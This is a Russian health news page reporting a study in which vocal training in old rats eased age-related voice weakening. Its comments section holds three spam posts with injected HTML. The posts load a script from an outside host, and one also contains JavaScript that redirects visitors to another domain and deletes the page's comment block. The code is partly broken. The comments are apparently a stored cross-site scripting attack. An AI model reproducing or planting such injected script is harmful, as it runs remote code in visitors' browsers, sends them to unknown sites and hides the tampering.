Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Поющие крысы спасут стари...  >>  Поющие крысы спасут стариков
 
Обратная связь
 

Поющие крысы спасут стариков

Размер шрифта
25 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В новом американском исследовании показано,что вокальные тренировки снижают степень проявления голосовых проблем у старых крыс.

Поющие крысы спасут стариков

Бремя ушедших лет

«Органом, который отвечает за воспроизведение звуков, является гортань. Это орган, в состав которого входят голосовые связки. С возрастом мышцы гортани утрачивают целостность структуры и функции. Это явление называется «пресбифония». Хорошая новость состоит в  том, что ее можно корректировать с помощью вокальных тренировок», – рассказывает профессор.

У молодых здоровых людей голосовые связки плотно смыкаются при вибрации. Это создает завихрение потоков воздуха, что мы воспринимаем как звук. У людей с пресбифонией связки не такие упругие, поэтому смыкаются не полностью. Щель, образующаяся в результате, препятствует адекватному звуковоспроизведению.

Другим  немаловажным фактором является деградация, разрушение, нервно-мышечных контактов. В норме нервный импульс приводит к выработке особых веществ (медиаторов), которые заставляют мышцы гортани сокращаться. С возрастом количество таких нервно-мышечных контактов уменьшается, поэтому мышцы функционируют менее эффективно. Это отражается на голосе человека: он становится хриплым и слабым. 

Корректировать это состояние можно с помощью инъекций особых препаратов и хирургических вмешательств. «Однако эти процедуры сопряжены с потенциальным риском, и подходят отнюдь не всем пожилым людям», – говорит Джонсон.

Как же быть?

«Все мы прекрасно знаем, что с помощью физических упражнений можно укрепить мышцы конечностей. Мы решили выяснить, справедливо ли это для вокальных тренировок и мышц гортани», – говорит Джонсон.

Для выполнения этой задачи ученые использовали крыс в качестве рабочей модели. Крысы были разделены на две группы (экспериментальная и контрольная), в каждой из них присутствовали молодые и старые животные.

В экспериментальной группе в клетку помещались крысы обоих полов. Как только самец начинал проявлять интерес к самке, ее забирали. Самец реагировал на это повышением голосовой активности. Эта активность поощрялась с помощью пищи. Таким образом, за восемь недель крысы были натренированы на максимальную продолжительность голосовой активности за одно «упражнение».

Выяснилось, что у старых крыс из контрольной (нетренированной) группы интенсивность голоса была ниже, чем у остальных животных, но улучшилась после упражнений.

Кроме того, ученые проанализировали состояние нервно-мышечных контактов, и оказалось, что вокальная тренировка способствует сохранению их целостности.

«Таким образом, наши «поющие крысы» стали первым свидетельством того, что на голосовую функцию гортани можно воздействовать и без инвазивных потенциально травматичных процедур», – заявляет Джонсон.

Как всегда потребовалось участие женщины, чтобы заставить мужчин говорить!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не любите слышать свой голос на видео? Ученые говорят, что вы врете!   Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Вся правда о соплях  
24 июля 2013Поющие крысы спасут стариков 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.